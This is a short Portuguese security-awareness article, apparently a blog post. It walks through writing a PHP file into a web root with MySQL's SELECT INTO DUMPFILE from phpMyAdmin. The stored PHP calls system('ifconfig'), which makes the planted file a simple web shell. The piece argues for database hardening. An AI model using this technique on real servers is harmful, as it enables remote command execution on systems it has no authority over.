MySQL DUMPFILE 🙄

Este artigo tem como objetivo reforçar a importância da realização do hardening e/ou revisão de segurança antes de colocar um servidor de banco de dados em produção e liberar os acessos ao banco sem as devidas revisões de permissões.

Aqui eu mostro apenas um exemplo de como criar um arquivo dentro do servidor web utilizando o phpMyAdmin. Certamente os profissionais de segurança sabem o impacto que isso pode causar na segurança dos servidores.

Para mais detalhes acesse : mariadb.com/kb/en/select-into-dumpfile

01 - Passo

Estou conectado no servidor web e executei os comandos para verificar o hostname, ips e a existência do arquivo comandos.php

Linux

hostname

ifconfig

ls -l /var/www/html/comandos.php

02 - Passo

Como pode observar o arquivo comandos.php não existe no servidor.

http://www/comandos.php

03 - Passo

Acesse o phpMyAdmin e utilize qualquer banco de dados disponível para criar a tabela comandos.

04 - Passo

Neste exemplo criei a tabela comandos com 02 colunas, id e comandos.

id

• Tipo : INT
• Tamanho : 1
• AUTO_INCREMENT : ✔

comandos

• Tipo : VARCHAR
• Tamanho : 255

05 - Passo

Insira os valores a seguir :

id : 1

comandos

Crie uma página em PHP usando os comandos dentro de system('ifconfig');

06 - Passo

Clique na aba SQL e execute o comando a seguir para criar o arquivo comandos.php.

SELECT * INTO DUMPFILE '/var/www/html/comandos.php' FROM `comandos` WHERE 1

07 - Passo

Acesse o arquivo comandos.php criado no servidor para obter as informações.

http://www/comandos.php